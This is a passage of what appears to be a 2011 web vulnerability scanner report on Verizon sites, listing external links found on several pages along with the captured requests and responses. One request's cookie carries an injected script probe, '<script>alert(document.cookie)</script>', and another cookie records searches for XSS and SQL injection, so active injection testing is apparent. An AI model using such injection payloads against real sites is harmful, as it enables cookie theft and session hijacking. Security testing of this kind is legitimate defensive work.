<td onMouseOver="if(self.vzDD)vzDD(this);" onMouseOut="if(self.vzDO)vzDO(this);" class="col1"><a href="/solutions/" />Solutions</a>
<ul class="one">
<li onMouseOver="vzDD(thi
...[SNIP]...
<li><a onclick="" href="http://www22.verizon.com/indirectsales/">United States</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" class="666" onMouseOut="vzDO(this)"><a href="https://enterprisecenter.verizon.com" target="_blank">Enterprise Center Sign In</a>
...[SNIP]...

15.43. http://www.verizonwireless.com/b2c/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/index.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.verizonwireless.com/b2c/index.html?tab=business

The response contains the following links to other domains:

http://aboutus.vzw.com/Corporate_Responsibility/Corporate_Responsibility.html
http://aboutus.vzw.com/accessibility/index.html
http://aboutus.vzw.com/securecode/mastercard.html
http://aboutus.vzw.com/securecode/visa.html
http://aboutus.vzw.com/wirelessissues/avoidpotentialhearingloss.html
http://aboutus.vzw.com/wirelessissues/driving.html
http://aboutus.vzw.com/wirelessissues/radioEmissions.html
http://b2b.vzw.com/international/index.html
http://b2b.vzw.com/machinetomachine/index.html
http://b2b.vzw.com/productsservices/businesspromotions.html
http://b2b.vzw.com/productsservices/index.html
http://b2b.vzw.com/productsservices/wirelessemail/index.html
http://business.verizon.net/
http://cache.vzw.com/globalnav/css/globalnav-js.css?v=11-09
http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/images_b2c/shared/mcsclogo.jpg
http://cache.vzw.com/images_b2c/shared/nav/bbb_online.gif
http://cache.vzw.com/images_b2c/shared/nav/ctia_seal.gif
http://cache.vzw.com/images_b2c/shared/nav/finalmark.gif
http://cache.vzw.com/images_b2c/shared/vbvlogo.jpg
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/onlineopinionV5/oo_style.css
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/homeLogin.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
http://cache.vzw.com/stylesheets/accessiblePrint.css
http://cache.vzw.com/stylesheets/ecom.css?v=11-09
http://cache.vzw.com/stylesheets/fonts.css?v=11-09
http://cache.vzw.com/stylesheets/homepage.css?v=11-09
http://cache.vzw.com/stylesheets/layout.css?v=11-09
http://cache.vzw.com/stylesheets/vzw_jquery.css
http://community.vzw.com/
http://files.ctia.org/pdf/The_Code.pdf
http://support.vzw.com/splash/collateraldownload.html
http://www.bbbonline.org/cks.asp?id=10305271131732383
http://www.droiddoes.com/
http://www.lte.vzw.com/
http://www.trade-in.vzw.com/
http://www.verizonbusiness.com/us/resources/flash/vec/
http://www.vzwcareers.com/
http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx
http://www22.verizon.com/privacy/
https://email.vzwshop.com/servlet/website/ResponseForm?OSPE8b6_vimpg_.3dLgLkHs
https://enterprisecenter.verizon.com/
https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
https://fls.doubleclick.net/activityi;src=685973;type=estor882;cat=vzwbu303;ord=1?
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:42 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 23896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lan
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no" />

   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/layout.css?v=11-09" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/fonts.css?v=11-09" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/ecom.css?v=11-09" />


               <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/vzw_jquery.css" />

   <link rel="stylesheet" href="http://cache.vzw.com/globalnav/css/globalnav-js.css?v=11-09" />
   

   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/homepage.css?v=11-09" />
   

   <link rel="stylesheet" media="print" type="text/css" href="http://cache.vzw.com/stylesheets/accessiblePrint.css" />

   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/onlineopinionV5/oo_style.css" />

   <script type="text/javascript">
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<li><a class="boldLink" href="https://email.vzwshop.com/servlet/website/ResponseForm?OSPE8b6_vimpg_.3dLgLkHs" target="_blank">Signup for email offers</a>
...[SNIP]...
<li style="padding-bottom:3px;"><a class="boldLink" href="https://enterprisecenter.verizon.com">Login to Verizon Enterprise Center</a>
...[SNIP]...
</div>
                   <a class="boldLink" href="https://enterprisecenter.verizon.com">Login to My Verizon Enterprise Center</a>
...[SNIP]...
</a>
               | <a href="https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do" style="margin:0 3px;">Register</a> |
               <a href="http://www.verizonbusiness.com/us/resources/flash/vec/" style="margin-left:3px;">View Demo</a>
...[SNIP]...
<li><a href="http://b2b.vzw.com/productsservices/index.html">Business Products & Services</a>
...[SNIP]...
<li><a href="http://b2b.vzw.com/machinetomachine/index.html">Machine to Machine Services</a>
...[SNIP]...
<li><a href="http://b2b.vzw.com/productsservices/wirelessemail/index.html">Wireless Email Solutions</a>
...[SNIP]...
<li><a href="http://b2b.vzw.com/international/index.html">Global Services</a>
...[SNIP]...
<li><a href="http://b2b.vzw.com/productsservices/businesspromotions.html">Current Promotions</a>
...[SNIP]...
</script>

<script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/homeLogin.js"></script>
...[SNIP]...
</span>

                                                                       <a href="http://support.vzw.com/splash/collateraldownload.html">Brochures</a>
...[SNIP]...
</span>
           <a href="http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx">Business</a>
...[SNIP]...
</span>
           <a href="http://www.vzwcareers.com/">Careers</a>
...[SNIP]...
</span>
           <a href="http://aboutus.vzw.com/accessibility/index.html">Accessibility</a>
...[SNIP]...
</span>
           <a href="http://www.lte.vzw.com">LTE Innovation Center</a>
...[SNIP]...
</span>
           <a href="http://business.verizon.net" onclick="popUp(this.href,'popup',400,500);return false;">Small Business Center</a>
...[SNIP]...
<div style="padding-top:5px;">
               <a href="http://www.trade-in.vzw.com">Trade-In Program</a>
...[SNIP]...
</span>


                   <a href="http://www22.verizon.com/privacy/">Privacy</a>
...[SNIP]...
</span>
               <a href="http://aboutus.vzw.com/Corporate_Responsibility/Corporate_Responsibility.html">Corporate Responsibility </a>
...[SNIP]...
</span>
               <a href="http://aboutus.vzw.com/wirelessissues/radioEmissions.html">Radio Frequency Emissions</a>
...[SNIP]...
</span>

                   <a href="http://aboutus.vzw.com/wirelessissues/avoidpotentialhearingloss.html">Avoid Potential Hearing Loss</a>
...[SNIP]...
</span>

               <a href="http://aboutus.vzw.com/wirelessissues/driving.html">Drive Responsibly</a>
...[SNIP]...
</span>
               <a href="http://community.vzw.com">Verizon Wireless Community</a>
...[SNIP]...
</span>
               <a href="http://www.droiddoes.com">Droid Does</a>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>

           <a href="http://www.verizonwireless.com/b2c/globalText?contentType=globalContent"><img src="http://cache.vzw.com/images_b2c/shared/nav/finalmark.gif" alt="TRUST-e Privacy" height="72" width="125" /></a>

           <a href="http://www.bbbonline.org/cks.asp?id=10305271131732383" onclick="popUp(this.href,'popup',450,300);return false;"><img src="http://cache.vzw.com/images_b2c/shared/nav/bbb_online.gif" height="72" width="103" alt="BBB Accredited Business" /></a>

           <a href="http://files.ctia.org/pdf/The_Code.pdf"><img src="http://cache.vzw.com/images_b2c/shared/nav/ctia_seal.gif" width="64" height="62" alt="Consumer Information Code" /></a>

           <a href="http://aboutus.vzw.com/securecode/visa.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/vbvlogo.jpg" height="52" width="79" alt="Verified by Visa" /></a>
           <a href="http://aboutus.vzw.com/securecode/mastercard.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/mcsclogo.jpg" height="50" width="80" alt="MasterCard SecureCode" /></a>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...
<noscript>
<iframe src="https://fls.doubleclick.net/activityi;src=685973;type=estor882;cat=vzwbu303;ord=1?" title="" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

15.44. http://www.verizonwireless.com/b2c/store/controller previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/store/controller

Issue detail

The page was loaded from a URL containing a query string:

http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewStoreIndex

The response contains the following links to other domains:

http://aboutus.vzw.com/securecode/mastercard.html
http://aboutus.vzw.com/securecode/visa.html
http://business.verizon.net/
http://www.bbbonline.org/cks.asp?id=10305271131732383
http://www.trade-in.vzw.com/
http://www22.verizon.com/privacy/
https://scache.vzw.com/globalnav/css/globalnav-js.css?v=11-09
https://scache.vzw.com/globalnav/globalnav.js?v=11-09
https://scache.vzw.com/images_b2c/shared/mcsclogo.jpg
https://scache.vzw.com/images_b2c/shared/nav/bbb_online.gif
https://scache.vzw.com/images_b2c/shared/nav/finalmark.gif
https://scache.vzw.com/images_b2c/shared/vbvlogo.jpg
https://scache.vzw.com/js/shared/hbx/hbx.js
https://scache.vzw.com/js/shared/hbx/hbxFunctions.js
https://scache.vzw.com/js/shared/hbx/hbxVariables.js
https://scache.vzw.com/onlineopinionV5/oo_conf.js
https://scache.vzw.com/onlineopinionV5/oo_engine.min.js
https://scache.vzw.com/onlineopinionV5/oo_style.css
https://scache.vzw.com/scripts/accessible/customnote.js
https://scache.vzw.com/scripts/accessible/layers.js
https://scache.vzw.com/scripts/accessible/lib.js
https://scache.vzw.com/scripts/accessible/library.js?v=11-09
https://scache.vzw.com/scripts/accessible/mootools131.js
https://scache.vzw.com/scripts/accessible/mootools131more.js
https://scache.vzw.com/scripts/homepage/swfobject.js
https://scache.vzw.com/scripts/liveperson/mtagconfig.js
https://scache.vzw.com/scripts/offermatica/mbox.js
https://scache.vzw.com/scripts/vzw_jquery.js
https://scache.vzw.com/stylesheets/accessiblePrint.css
https://scache.vzw.com/stylesheets/ecom.css?v=11-09
https://scache.vzw.com/stylesheets/fonts.css?v=11-09
https://scache.vzw.com/stylesheets/layout.css?v=11-09
https://scache.vzw.com/stylesheets/vzw_jquery.css
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/store/controller?item=phoneFirst&action=viewStoreIndex HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; gnVersion=2011Jul31030844; mybizCookie=true; mbox=session#1315278939788-568601#1315280871|PC#1315278939788-568601.19#1316488611|check#true#1315279071; CP=null*

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:20:53 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                                                                       <html xmlns="http://www.w3.org/
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no" />

   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/layout.css?v=11-09" />
   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/fonts.css?v=11-09" />
   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/ecom.css?v=11-09" />


               <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/vzw_jquery.css" />

   <link rel="stylesheet" href="https://scache.vzw.com/globalnav/css/globalnav-js.css?v=11-09" />
   

   <link rel="stylesheet" media="print" type="text/css" href="https://scache.vzw.com/stylesheets/accessiblePrint.css" />

   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/onlineopinionV5/oo_style.css" />

   <script type="text/javascript">
...[SNIP]...
</script>


           <script type="text/javascript" src="https://scache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="https://scache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</span>

                                                                           <a href="http://www22.verizon.com/privacy/">Privacy</a>
...[SNIP]...
</span>
       <a href="http://business.verizon.net" onclick="popUp(this.href,'popup',400,500);return false;">Small Business Center</a>
...[SNIP]...
</span>
       <a href="http://www.trade-in.vzw.com">Trade-In Program</a>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>

           <a href="http://www.verizonwireless.com/b2c/globalText?contentType=globalContent"><img src="https://scache.vzw.com/images_b2c/shared/nav/finalmark.gif" alt="TRUST-e Privacy" height="72" width="125" /></a>

           <a href="http://www.bbbonline.org/cks.asp?id=10305271131732383" onclick="popUp(this.href,'popup',450,300);return false;"><img src="https://scache.vzw.com/images_b2c/shared/nav/bbb_online.gif" height="72" width="103" alt="BBB Accredited Business" /></a>

           <a href="http://aboutus.vzw.com/securecode/visa.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="https://scache.vzw.com/images_b2c/shared/vbvlogo.jpg" height="52" width="79" alt="Verified by Visa" /></a>
           <a href="http://aboutus.vzw.com/securecode/mastercard.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="https://scache.vzw.com/images_b2c/shared/mcsclogo.jpg" height="50" width="80" alt="MasterCard SecureCode" /></a>
...[SNIP]...
</script>

   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

15.45. http://www22.verizon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www22.verizon.com/?lid=//global//residential

The response contains the following links to other domains:

http://www.changewaveresearch.com/
http://www.facebook.com/VerizonFiOS
http://www.thinkfinity.org/
http://www.verizonwireless.com/
http://www.verizonwireless.com/b2c/index.html
https://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=1?

Request

GET /?lid=//global//residential HTTP/1.1
Host: www22.verizon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_landing.aspx
Cookie: ak-sf=false; __switchTo5x=51; __unam=49dc76-1323a4a13fb-1bbb4ff9-1; ASP.NET_SessionId=ncxmtseom3hg3h4542cc0c55; GlobalSessionID=NEScwnwaL4QccG18LnT8IJ7HQ%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:13:38 PM; AkaUTrackingID=804E8C682B3FA4D861FA571CC854E9FD; AkaSTrackingID=22240856919E5F4D120128A4C01974E7; V347=3JqCYcsE1rlAhTfmCIUyRZ-iggeiohK6a-FKkJ_aMvvIaMkdz3Ks80g; hbxRet=Y; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ca45525d5f4f58455e445a4a423660; Product=A; ProductXML=A; BusinessUnit=residential

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 128866
Cache-Control: private, max-age=1800
Date: Mon, 05 Sep 2011 22:14:18 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head >
<title>Verizon | Broadband (DSL) Internet Service, Cable TV (Digital TV,
...[SNIP]...
<LI><A style="WIDTH: 63px" title="Verizon Wireless" href="http://www.verizonwireless.com/" name=&lid=hp_wireless_tab>Wireless</A>
...[SNIP]...
<LI><A href="http://www.verizonwireless.com/b2c/index.html" name=&lid=overlay_phone_wireless><IMG alt="" src="/Content/Commonfiles/images/globalheader/new_header/i/wireless.gif">
...[SNIP]...
<BR>* Source: June 2010 Proprietary survey conducted by ChangeWave Research. Based on HD and overall picture quality ratings among a panel of educated consumers. For more on ChangeWave Research, visit <A href="http://www.changewaveresearch.com/">www.changewaveresearch.com</A>
...[SNIP]...
<LI><A id=foundation href="http://www.thinkfinity.org/" name=&lid=hp_bus_footer_vzthinkfinity>Verizon Thinkfinity</A>
...[SNIP]...
<LI><A id=foundation href="http://www.facebook.com/VerizonFiOS" name=&lid=hp_res_footer_verizon_on_facebook>Verizon on Facebook</A>
...[SNIP]...

<iframe src="https://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=1?" width="1" height="1"

frameborder="0"></iframe>
...[SNIP]...

15.46. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/ak-cached/origin/SupportService.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Foryourhome/MyAccount/Unprotected/ak-cached/origin/SupportService.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/ak-cached/origin/SupportService.aspx?Load=CS

The response contains the following links to other domains:

http://community.vzw.com/t5/DROID-Charge-by-Samsung/Droid-Charge-Communication-errors-No-network-coverage/td-p/648943
http://community.vzw.com/t5/Media-Store/Default-Ringback-Tone-Won-t-Delete/td-p/648501
http://community.vzw.com/t5/Media-Store/QUESTION-ABOUT-SANDISK-MEMORY-CARDS-FOR-PHONES/td-p/652347
http://community.vzw.com/t5/Other/QUESTION-ABOUT-CERTIFIED-PRE-OWNED/td-p/652419
http://community.vzw.com/t5/ThunderBolt-by-HTC/Unknown-Caller/td-p/652341
http://community.vzw.com/t5/iPhone-4/New-Apps-for-iphone4/td-p/650309
http://support.directv.com/
http://support.directv.com/app/troubleshooting/p/21
http://support.vzw.com/billing/?lid=//global//support//billing+and+account
http://support.vzw.com/billing/top_questions.html
http://www.directv.com/DTVAPP/content/contact_us
http://www.directv.com/DTVAPP/content/equipment/accessories
http://www.directv.com/DTVAPP/content/equipment/receivers
http://www.directv.com/DTVAPP/content/equipment/remotes
http://www.directv.com/DTVAPP/epg/theGuide.jsp
https://ebillpay.verizonwireless.com/vzw/accountholder/account/maint-features.do
https://support.vzw.com/
https://support.vzw.com/features/view_all.html
https://support.vzw.com/phones/
https://www.verizonwireless.com/b2c/accountholder/store/controller?item=addalineItem&action=displaysplash
https://www.verizonwireless.com/b2c/accountholder/store/controller?item=callingplanItem&action=displayMDN
https://www.verizonwireless.com/multimedia/voicemail/vmdemo_v1/index.html

Request

GET /Foryourhome/MyAccount/Unprotected/ak-cached/origin/SupportService.aspx?Load=CS HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc65c45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA07V
Content-Type: text/html; charset=utf-8
Content-Length: 16234
Cache-Control: private, max-age=0
